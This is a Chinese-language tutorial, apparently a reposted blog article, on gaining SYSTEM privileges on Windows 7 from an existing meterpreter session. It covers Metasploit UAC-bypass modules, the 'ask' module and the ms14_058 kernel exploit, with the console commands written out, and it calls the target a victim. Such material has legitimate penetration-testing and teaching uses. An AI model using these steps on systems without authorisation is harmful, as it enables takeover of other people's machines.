標籤:log nas 完全 xpl load meta def src gets
metasploit下Windows的多種提權方法
前言
當你在愛害者的機器上執行一些操作時,發現有一些操作被拒絕執行,為了獲得受害機器的完全許可權,你需要繞過限制,擷取本來沒有的一些許可權,這些許可權可以用來刪除檔案,查看私人資訊,或者安裝特殊程式,比如病毒。Metasploit有很多種後滲透方法,可以用於對目標機器的許可權繞過,最終擷取到系統許可權。
環境要求:
1.攻擊機:kali linux
2.目標機:Win 7
在已經擷取到一個meterpreter shell後,假如session為1,且許可權不是系統許可權的前提下,使用以下列出的幾種提權方法:
一、繞過UAC進行提權
本方法主要有以下3個模組。
上面這些模組的詳細資料在metasploit裡已有介紹,這裡不再多說,主要說一下使用方法。以exploit/windows/local/bypassuac模組為例
該模組在windows 32位和64位下都有效。
msf > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set session 1msf exploit(bypassuac) > exploit
本模組執行成功後將會返回一個新的meterpreter shell,如下
模組執行成功後,執行getuid發現還是普通許可權,不要失望,繼續執行getsystem,再次查看許可權,成功繞過UAC,且已經是系統許可權了。
其他兩個模組用法和上面一樣,原理有所不同,執行成功後都會返回一個新的meterpreter shell,且都需要執行getsystem擷取系統許可權。如:
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
二、提高程式運行層級(runas)
這種方法可以利用exploit/windows/local/ask模組,但是該模組實際上只是以高許可權重啟一個返回式shellcode,並沒有繞過UAC,會觸發系統UAC,受害機器有提示,提示使用者是否要運行,如果使用者選擇“yes”,就可以程式返回一個高許可權meterpreter shell(需要執行getsystem)。如下:
在受害機器上會彈出UAC,提示使用者是否運行。如下:
三、利用windows提權漏洞進行提權
可以利用metasploit下已有的提權漏洞,如ms13_053,ms14_058,ms16_016,ms16_032等。下面以ms14_058為例。
msf > exploit/windows/local/ms14_058_track_popup_menumsf exploit(ms14_058_track_popup_menu) > set session 1msf exploit(ms14_058_track_popup_menu) > exploit
用windows提權漏洞提權時,會直接返回高許可權meterpreter shell,不需要再執行getsystem命令。
需要說明的是:在實際測試時,如果出現目標機器確實有漏洞,但是提權沒有成功時,請確認你的TARGET和PAYLOAD是否設定正確,64位的系統最好用64位的PAYLOAD。
參考連結
http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/?utm_source=tuicool&utm_medium=referral
metasploit下Windows的多種提權方法